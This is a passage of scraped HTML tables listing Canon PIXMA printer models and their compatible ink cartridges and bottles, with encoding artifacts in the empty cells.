width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 